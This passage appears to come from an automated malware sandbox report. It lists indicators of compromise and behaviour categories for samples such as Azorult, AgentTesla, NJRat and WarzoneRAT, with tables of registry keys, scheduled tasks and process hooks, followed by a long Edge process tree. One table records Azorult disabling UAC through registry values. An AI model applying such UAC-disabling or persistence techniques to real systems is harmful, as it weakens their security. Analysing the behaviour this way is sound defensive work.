File opened for modification | C:\Users\Admin\Downloads\NetWire.exe:Zone.Identifier | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\WarzoneRAT.exe:Zone.Identifier | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\$uckyLocker.exe:Zone.Identifier | msedge.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: WINWORD.EXE, winit.exe

| description | ioc | process |
| --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | winit.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | winit.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE |

-
Delays execution with timeout.exe 7 IoCs
Processes: timeout.exe, timeout.exe, timeout.exe, timeout.exe, timeout.exe, timeout.exe, timeout.exe

| pid | process |
| --- | --- |
| 4616 | timeout.exe |
| 5196 | timeout.exe |
| 4360 | timeout.exe |
| 5720 | timeout.exe |
| 5836 | timeout.exe |
| 5940 | timeout.exe |
| 5636 | timeout.exe |

-
Enumerates system info in registry 2 TTPs 9 IoCs
Processes: msedge.exe, msedge.exe, WINWORD.EXE

| description | ioc | process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE |

-
Gathers network information 2 TTPs 1 IoCs
Uses a command-line utility to view network configuration.
Processes: ipconfig.exe

| pid | process |
| --- | --- |
| 4604 | ipconfig.exe |

-
Kills process with taskkill 5 IoCs
Processes: taskkill.exe, taskkill.exe, taskkill.exe, taskkill.exe, taskkill.exe

| pid | process |
| --- | --- |
| 3588 | taskkill.exe |
| 496 | taskkill.exe |
| 1436 | taskkill.exe |
| 5712 | taskkill.exe |
| 1436 | taskkill.exe |

-
Modifies registry class 11 IoCs
Processes: winupdate.exe, msedge.exe, Blackkomet.exe, winupdate.exe, wini.exe, winit.exe, R8.exe, cmd.exe, msedge.exe

| description | ioc | process |
| --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | winupdate.exe |
| Key created | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings | msedge.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | Blackkomet.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | winupdate.exe |
| Key created | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings | wini.exe |
| Key created | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\MIME\Database | winit.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | winit.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | winit.exe |
| Key created | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings | R8.exe |
| Key created | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings | cmd.exe |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2842058299-443432012-2465494467-1000\{D6DCA534-0027-48DB-9FFC-EC22F3BBB122} | msedge.exe |

-
NTFS ADS 38 IoCs
-
Runs .reg file with regedit 2 IoCs
Processes: regedit.exe, regedit.exe

| pid | process |
| --- | --- |
| 576 | regedit.exe |
| 3912 | regedit.exe |

-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe

| pid | process |
| --- | --- |
| 1916 | schtasks.exe |
| 5360 | schtasks.exe |
| 1980 | schtasks.exe |
| 2156 | schtasks.exe |
| 5660 | schtasks.exe |
| 4788 | schtasks.exe |

-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes: WINWORD.EXE

| pid | process |
| --- | --- |
| 5036 | WINWORD.EXE |
| 5036 | WINWORD.EXE |

-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes: msedge.exe, NJRat.exe, taskhostw.exe

| pid | process |
| --- | --- |
| 3152 | msedge.exe |
| 2328 | NJRat.exe |
| 428 | taskhostw.exe |

-
Suspicious behavior: LoadsDriver 3 IoCs
Processes:

| pid | process |
| --- | --- |
| 660 | |
| 660 | |
| 660 | |

-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 47 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes: rfusclient.exe

| pid | process |
| --- | --- |
| 5816 | rfusclient.exe |

-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 38 IoCs
-
Suspicious use of SetWindowsHookEx 30 IoCs
Processes: msedge.exe, WINWORD.EXE, AgentTesla.exe, Azorult.exe, wini.exe, winit.exe, rutserv.exe, rutserv.exe, rutserv.exe, rutserv.exe, cheat.exe, taskhost.exe, P.exe, ink.exe, R8.exe, winlogon.exe, taskhostw.exe, winlogon.exe

| pid | process |
| --- | --- |
| 3152 | msedge.exe |
| 3152 | msedge.exe |
| 5036 | WINWORD.EXE |
| 5036 | WINWORD.EXE |
| 5036 | WINWORD.EXE |
| 5036 | WINWORD.EXE |
| 5036 | WINWORD.EXE |
| 5036 | WINWORD.EXE |
| 5036 | WINWORD.EXE |
| 5036 | WINWORD.EXE |
| 5036 | WINWORD.EXE |
| 5036 | WINWORD.EXE |
| 5036 | WINWORD.EXE |
| 916 | AgentTesla.exe |
| 3696 | Azorult.exe |
| 4024 | wini.exe |
| 2420 | winit.exe |
| 2364 | rutserv.exe |
| 3144 | rutserv.exe |
| 5816 | rutserv.exe |
| 5284 | rutserv.exe |
| 5872 | cheat.exe |
| 2248 | taskhost.exe |
| 6036 | P.exe |
| 1472 | ink.exe |
| 5868 | R8.exe |
| 6004 | winlogon.exe |
| 428 | taskhostw.exe |
| 808 | winlogon.exe |
| 3152 | msedge.exe |

-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 3 IoCs
Processes: Azorult.exe

| description | ioc | process |
| --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Azorult.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Azorult.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | Azorult.exe |

-
Views/modifies file attributes 1 TTPs 12 IoCs
Processes: attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe

| pid | process |
| --- | --- |
| 5384 | attrib.exe |
| 2356 | attrib.exe |
| 3320 | attrib.exe |
| 4320 | attrib.exe |
| 1960 | attrib.exe |
| 716 | attrib.exe |
| 2916 | attrib.exe |
| 5736 | attrib.exe |
| 2484 | attrib.exe |
| 4704 | attrib.exe |
| 2880 | attrib.exe |
| 5992 | attrib.exe |

Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pornhub.com
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa16b83cb8,0x7ffa16b83cc8,0x7ffa16b83cd8
2⤵ PID:1556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:22⤵PID:4988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:82⤵PID:1516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:12⤵PID:3908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:12⤵PID:4444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:12⤵PID:4636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5852 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:12⤵PID:2736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:12⤵PID:1312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:12⤵PID:3744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:12⤵PID:3164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:12⤵PID:4764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1120 /prefetch:12⤵PID:5036
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1100
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1508
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3152 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa16b83cb8,0x7ffa16b83cc8,0x7ffa16b83cd82⤵PID:1100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1952 /prefetch:22⤵PID:4400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:82⤵PID:4868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:12⤵PID:4476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:12⤵PID:1924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:12⤵PID:1236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:12⤵PID:2548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3500 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:12⤵PID:2112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:12⤵PID:496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5320 /prefetch:82⤵PID:4136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5280 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:12⤵PID:3144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:12⤵PID:1948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:12⤵PID:4684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:12⤵PID:1612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:12⤵PID:904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4368 /prefetch:12⤵PID:4060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:12⤵PID:2752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:12⤵PID:2476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6656 /prefetch:82⤵PID:2704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6692 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:12⤵PID:1720
-
-
